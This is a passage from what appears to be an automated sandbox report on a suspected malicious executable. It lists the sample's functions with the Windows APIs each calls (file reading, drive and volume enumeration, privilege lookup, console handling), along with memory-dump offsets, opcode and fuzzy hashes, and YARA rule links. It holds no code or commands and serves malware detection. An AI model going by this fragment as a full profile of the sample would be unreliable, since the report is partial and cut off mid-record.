                                                    • Instruction ID: a472e427cc0c15912f0e09c2ed5aec5a9e91397d2c4c20525227d080c49bfb98
                                                    • Opcode Fuzzy Hash: 838382800a2d7c6194f85b137cbc991fc875d15cd4798da00d0019a4e35b30bf
                                                    • Instruction Fuzzy Hash: 96119D72508780AFDB22CF65CC44B52FFF4EF49210F08849AE9898B662D3B5A419DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 027708E5
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 4d2e3768b952db0474c75f00003c7d0fdeb375f6ea8bd363254f5e39e1d15d72
                                                    • Instruction ID: 292b9bdb268dbdf25ee0594edf72200cc11aa0c99d17a83a616700efe66b60d9
                                                    • Opcode Fuzzy Hash: 4d2e3768b952db0474c75f00003c7d0fdeb375f6ea8bd363254f5e39e1d15d72
                                                    • Instruction Fuzzy Hash: 9711CE72500300EFFB21CF51DC85FA6FBE8EF14720F04856AED499A241D675A908CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: d525db3037389478f42c12693d0fc9aded96267f54e6902aa86f0045386c6d75
                                                    • Instruction ID: 3b21d308bc87b0ba70254d01b9d25cdb7a4d8ce2b17a79a4eb7bb4cb1b78360d
                                                    • Opcode Fuzzy Hash: d525db3037389478f42c12693d0fc9aded96267f54e6902aa86f0045386c6d75
                                                    • Instruction Fuzzy Hash: CF114F715093C49FE7128B15DC54AA2BFB4DF47614F0880DBEDC58F263D265A808DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027712D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 0e3ee81c849fe0db58be69de00e771b564548e9fbecc7527e055c86d29a54518
                                                    • Instruction ID: 68e00b5993538f8f8a44cc6ff74719db1ac1e48ea8dbe041f44564dec85c2bbf
                                                    • Opcode Fuzzy Hash: 0e3ee81c849fe0db58be69de00e771b564548e9fbecc7527e055c86d29a54518
                                                    • Instruction Fuzzy Hash: CF1191715093849FDB128F25DC45B96FFE4EF06220F0984EEED898F262D375A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027705E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: ad149debd35cd2ac8e43928dd9ab5c19cf3a4a9b0d86a9466673d89b2ca5af2f
                                                    • Instruction ID: 6e3f1649b5f485f264f5193428755a6c5f4a95a4f44d2aa4f761adc8e62be411
                                                    • Opcode Fuzzy Hash: ad149debd35cd2ac8e43928dd9ab5c19cf3a4a9b0d86a9466673d89b2ca5af2f
                                                    • Instruction Fuzzy Hash: C711C2755093C09FDB128B15DC95B52FFB4EF52224F0880DBED858F663D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D3AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 45b513e65094a871a7539cf37529bc101fb920953cb60a462abbdeaf4474783b
                                                    • Instruction ID: d35262213323592daa84be8130553a4102ad5110264dfdf301343d18e2d41acb
                                                    • Opcode Fuzzy Hash: 45b513e65094a871a7539cf37529bc101fb920953cb60a462abbdeaf4474783b
                                                    • Instruction Fuzzy Hash: D81161B27003009FEB24DF29DC85B56FBD8EF54621F08C46ADD89CB642D675E404CA71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01D3AA71
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 377bbac7efda8e3eaa5afa5a24b340ea4aeba34174c196b35d7837c8c6a334de
                                                    • Instruction ID: 295782fc70b5d951f465508867e17924a2ba5c1de8894dbb52927914fa4e09a8
                                                    • Opcode Fuzzy Hash: 377bbac7efda8e3eaa5afa5a24b340ea4aeba34174c196b35d7837c8c6a334de
                                                    • Instruction Fuzzy Hash: 2211E37650D7C49FD7128B15DC85B92BFB0EF07220F0980DBDD848F163D269A909C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 9afdc86054dccdac01d70ef3701d2fb1232020d6fb67851b5fdb9417e6ff6e41
                                                    • Instruction ID: 8eaded502fc8962935ad4fda6490f7ddacc7cec7022d6b75a1e38722c492e78a
                                                    • Opcode Fuzzy Hash: 9afdc86054dccdac01d70ef3701d2fb1232020d6fb67851b5fdb9417e6ff6e41
                                                    • Instruction Fuzzy Hash: DD119D715093C09FEB228B25DC55B92BFA4EF07324F0980DADD844F263D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027707C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,715BA33F,00000000,00000000,00000000,00000000), ref: 02770819
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: a9a13d76fac65d6e6747c5939751b34bd91af8951e572cf96ba45764cd695861
                                                    • Instruction ID: d7c90d1cc90ca2cc644eebf3fdf9bb11079d4b2bf3f084406907a2f2c7191c91
                                                    • Opcode Fuzzy Hash: a9a13d76fac65d6e6747c5939751b34bd91af8951e572cf96ba45764cd695861
                                                    • Instruction Fuzzy Hash: F9018C71500704EFFB209F15DC86BA6FB98EF44720F1485AAFD499B281D674A908CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027713AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 76b2cc76937ce08c1e1b7a40b43e427fbc56d085c73982d4ffa7c9f335fdf05f
                                                    • Instruction ID: 887203233e50dba336f6a588f86257e5996df25d91d1ec8b2974bf08431d8e16
                                                    • Opcode Fuzzy Hash: 76b2cc76937ce08c1e1b7a40b43e427fbc56d085c73982d4ffa7c9f335fdf05f
                                                    • Instruction Fuzzy Hash: 4F118B76600700DFEF20CF56DC85B66FBA4EF04620F4884AAED498B652D371E418CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01D3ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 37c652055bda20a8cf08c70d58d1ebfca7afaacd1ec71f307c6dd5c5bc7e6778
                                                    • Instruction ID: dbc5bc2979db803f5bef49c667123f8e5543e70672a50fee1a468e17602ee080
                                                    • Opcode Fuzzy Hash: 37c652055bda20a8cf08c70d58d1ebfca7afaacd1ec71f307c6dd5c5bc7e6778
                                                    • Instruction Fuzzy Hash: 19118EB65093809FDB11CF65DC85B92BFA4EF46224F0984ABDD888F253D275A508CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D3BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 7d4b8ecc0480ed7428b39b6a473452790c853a8349e87ba99ee9debb0265a087
                                                    • Instruction ID: da6c4490b10bba6d839b4a62d2027da738703b5450cbbbba629e5c0156512343
                                                    • Opcode Fuzzy Hash: 7d4b8ecc0480ed7428b39b6a473452790c853a8349e87ba99ee9debb0265a087
                                                    • Instruction Fuzzy Hash: 9C11CE32500B00DFEB21CF59CC44B62FBE4EF48211F0884AADD898A612D3B1E004DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D3A23E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 6dff4c62b8d769f335b4cc7a3da591420cdc3fea56e6a52f255edbd9ef529828
                                                    • Instruction ID: c48a8ec0532a962a8c0a914066d5386faabdfb44fd19cc35520cd0a24b165a6f
                                                    • Opcode Fuzzy Hash: 6dff4c62b8d769f335b4cc7a3da591420cdc3fea56e6a52f255edbd9ef529828
                                                    • Instruction Fuzzy Hash: 9E017171900600ABE310DF16DC46B66FBA8FB84A20F14816AED089B741E275B515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 1972ed44efc6f4f95509ec0fce0cbef30c941f5fbd4319fd59b64b573976dac6
                                                    • Instruction ID: ecfe312268e4405bf05c04f87db5eda0e73b3c85f376f9b856ad38b35520103f
                                                    • Opcode Fuzzy Hash: 1972ed44efc6f4f95509ec0fce0cbef30c941f5fbd4319fd59b64b573976dac6
                                                    • Instruction Fuzzy Hash: 21017171900600ABE310DF16DC46B66FBA8FB84A20F14816AED089B741E375B515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 71531c71f56acde1467728ef14e2e8bbe57bc053919907af22fe4163c7faeacd
                                                    • Instruction ID: 7d10abe47a7f6aa44c84bc5da78854399ffb1dc76a50ac3cf9788630b5edcfc0
                                                    • Opcode Fuzzy Hash: 71531c71f56acde1467728ef14e2e8bbe57bc053919907af22fe4163c7faeacd
                                                    • Instruction Fuzzy Hash: 99019E726003048FEB10DF2ADC8576AFB98EF01620F1884AADC09CB642D774E404CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D3BB2F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: 814e6e8625f3cbf317cac148e19a05f59908301567b3fa9e0b5e5878420fb0e1
                                                    • Instruction ID: 42b1f114312ffd91e3f1a6b3ef2e9093d2eaca8663ff29d8a6dca01611ee3524
                                                    • Opcode Fuzzy Hash: 814e6e8625f3cbf317cac148e19a05f59908301567b3fa9e0b5e5878420fb0e1
                                                    • Instruction Fuzzy Hash: 3D01DF71500200DFEB21CF19DC857A5FBA4EF44620F08C4ABDD498F256D675E804CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027712FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: d26172023cc65a19957d7790b55a978ae2406c906e34cd56b377f668a4c3a207
                                                    • Instruction ID: 4f0bbf2ca89e4340a72f81794dad3cd212fd5c620d5971d81a232d93698b2aec
                                                    • Opcode Fuzzy Hash: d26172023cc65a19957d7790b55a978ae2406c906e34cd56b377f668a4c3a207
                                                    • Instruction Fuzzy Hash: A401DF71504300DFEF20CF19DC857A5FBE4EF04620F48C4AADC498B652D375A404CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D3A94A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: efd33942d384536783a6f992da7f1bd01b5c574daf63d383afaf25c289f0639c
                                                    • Instruction ID: 087a5301c135dc4ffcc10c4d6f58862bcc901282f3a3a84f6f1d95b8840b1aa6
                                                    • Opcode Fuzzy Hash: efd33942d384536783a6f992da7f1bd01b5c574daf63d383afaf25c289f0639c
                                                    • Instruction Fuzzy Hash: E6016271900600ABD314DF16DC46B26FBA4FB88B20F14825AED085B741E275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 6a7eeb3549b4d91eb62d37c71f0ce9ec745bfa822af1564cf20f7c8af00f5c90
                                                    • Instruction ID: 236c926d2fb63bd5b722ec27d00621560554240618d1697b83f374e81efd8700
                                                    • Opcode Fuzzy Hash: 6a7eeb3549b4d91eb62d37c71f0ce9ec745bfa822af1564cf20f7c8af00f5c90
                                                    • Instruction Fuzzy Hash: BC017C71504340DFEB20DF16D885B66FB94EF01620F4884AADC48CF246D775E408CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027704B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: b3d083ebda6f34c9f73a6a5cf4b2ac55e115abfbfdc6542b775940ec3d161f36
                                                    • Instruction ID: 07c5c248d9293f6effe94ab909390a7deaa21202dfe57ff63b75a6d13e19c4a2
                                                    • Opcode Fuzzy Hash: b3d083ebda6f34c9f73a6a5cf4b2ac55e115abfbfdc6542b775940ec3d161f36
                                                    • Instruction Fuzzy Hash: 60016271900600ABD314DF16DC46B26FBA4FB88B20F14825AED085B741E275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: a17e1da085f72da3e9afe9c91a18e66a1d264c21c0a499093587c52915c12c67
                                                    • Instruction ID: d3f3917a293bbb1ef08706b14334306fa461eaf9685d9baece459103ec102244
                                                    • Opcode Fuzzy Hash: a17e1da085f72da3e9afe9c91a18e66a1d264c21c0a499093587c52915c12c67
                                                    • Instruction Fuzzy Hash: B201FF35600700CFEF208F1AD889761FBA0EF41620F08C0AADC498B752D3B5E808CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01D3ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: e320712685743b1c81f1eefc49f6665377b85bbdc008cbc072df7548b006ab15
                                                    • Instruction ID: 954236a385c648b962fe1b171ac3f1d6abd532a9246de4de0f96b09173ef6931
                                                    • Opcode Fuzzy Hash: e320712685743b1c81f1eefc49f6665377b85bbdc008cbc072df7548b006ab15
                                                    • Instruction Fuzzy Hash: 6101D131604340CFEB10DF1AD885B91FBA4EF44620F48C4AACD888F202D675E404CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02771116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 93daa8bfbc8c1dc7203001ad595f80f88560693260db95f8e644794c382701b1
                                                    • Instruction ID: 9b4f3696250b2f6a51caf0d5f7a19bc511014088ff4e26aca8d2aa4df12b34f7
                                                    • Opcode Fuzzy Hash: 93daa8bfbc8c1dc7203001ad595f80f88560693260db95f8e644794c382701b1
                                                    • Instruction Fuzzy Hash: 1EF0FF34500740DFEB20CF05D885761FBA0EF00A21F88C0DACC484F312D679A448CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: b089756e5ffabcf6e96efd8e96ad574386c7b36cba562fd92606f4f15109de2a
                                                    • Instruction ID: e5035204c5f0a7b36d7b45abac5044bada707876d0ba4592c3f7ccf1f227001c
                                                    • Opcode Fuzzy Hash: b089756e5ffabcf6e96efd8e96ad574386c7b36cba562fd92606f4f15109de2a
                                                    • Instruction Fuzzy Hash: 78F0AF35604740DFEB219F4AD885765FBA0EF44721F08C09ADD898B312D3B9E408CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2130366890.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 4c685e4691c133bba874f6e80e13b57e39d10c992c9b9e7ad2fba5be18dbd909
                                                    • Instruction ID: 3d352424f492bbe92a2d9a4941d0c4012ff2c5b6e2cc33bf37e4e1c628dce193
                                                    • Opcode Fuzzy Hash: 4c685e4691c133bba874f6e80e13b57e39d10c992c9b9e7ad2fba5be18dbd909
                                                    • Instruction Fuzzy Hash: EAF0A935904740DFEB209F06D889766FBA0EF15621F08C09ADD894B316D3B9A408CEA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01D3AA71
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: c80dbdc97db5a32c018399b459ac0d41eea6e7ed25a7e34de8fa1b02ff523a4e
                                                    • Instruction ID: b35007d45b000daae4802bd889676500dec9e41e192d5ca3e45f995f406c18db
                                                    • Opcode Fuzzy Hash: c80dbdc97db5a32c018399b459ac0d41eea6e7ed25a7e34de8fa1b02ff523a4e
                                                    • Instruction Fuzzy Hash: F1F0C232604744CFEB11DF0AD985762FB90EF44621F48C09ADD898F252D279E504CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01D3A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: fdf539996d7fc915ccdecf6d55fe7d5245afa3019f13a6394dcca86f6654780c
                                                    • Instruction ID: 1e8cb8528d889e771ef8c5ee50c956f6a4deb392f13cd942a0637f6d32451c76
                                                    • Opcode Fuzzy Hash: fdf539996d7fc915ccdecf6d55fe7d5245afa3019f13a6394dcca86f6654780c
                                                    • Instruction Fuzzy Hash: 8E1191715093809FD712CF25DC45B92BFA4EF46220F0980ABED85CF262D275A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D3A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01D3A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121967498.0000000001D3A000.00000040.00000001.sdmp, Offset: 01D3A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 947ad737240c7f3442596fe701ef8f6633d85487e8abd8ed8f6762cfd56a7e6d
                                                    • Instruction ID: d071abc9d9f446468b7bcf1b21dd9c29dfbc0ab513101386dbf4fb1afdab7c65
                                                    • Opcode Fuzzy Hash: 947ad737240c7f3442596fe701ef8f6633d85487e8abd8ed8f6762cfd56a7e6d
                                                    • Instruction Fuzzy Hash: 0B01DF75600640CFEB10DF19D8857A6FB94EF44220F48C0AADC89CF252D275E804CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D323F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121945996.0000000001D32000.00000040.00000001.sdmp, Offset: 01D32000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03c45537c77d42d16b689a6aef4cad21bf1f6be684526852c26a05afeef5f481
                                                    • Instruction ID: b71827b62df36414d6475ca5dd4caf94def1d8038d8137ae555068164fd7dce1
                                                    • Opcode Fuzzy Hash: 03c45537c77d42d16b689a6aef4cad21bf1f6be684526852c26a05afeef5f481
                                                    • Instruction Fuzzy Hash: 4ED05E79604A818FE7168A1CC1A5B953BA4AFA9B04F4644F9E840CB6A3C768F581D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01D323BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2121945996.0000000001D32000.00000040.00000001.sdmp, Offset: 01D32000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 41cedf88f70fed16ceacc0c5d180e9e0f7293921bf408d898a9201280bbca151
                                                    • Instruction ID: 5b37bfcb2c18f7416465271ecbc71960fe01bb674bc256b6a822b46384b4faa9
                                                    • Opcode Fuzzy Hash: 41cedf88f70fed16ceacc0c5d180e9e0f7293921bf408d898a9201280bbca151
                                                    • Instruction Fuzzy Hash: 56D05E347406818FEB15DA1CC194F5977E4AF84B00F0644ECBC008B666C3A5E880C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: Bw6d8Paf6bOV36xS4N6.exe PID: 2368 Parent PID: 2336 Bw6d8Paf6bOV36xS4N6.exeCOMMON

                                                    Executed Functions

                                                    Function 002D1987, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 002D19B8
                                                    • KiUserExceptionDispatcher.NTDLL ref: 002D19CA
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.2181528814.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: ad53979340c14bcedb65d3f69ed0da372ee5c893bdcf9652fafd2da3d3c1a61c
                                                    • Instruction ID: 9b95ba527340ecf51dc92409433ea2eb0f99caa0709be6df72ac0ac6948d3f71
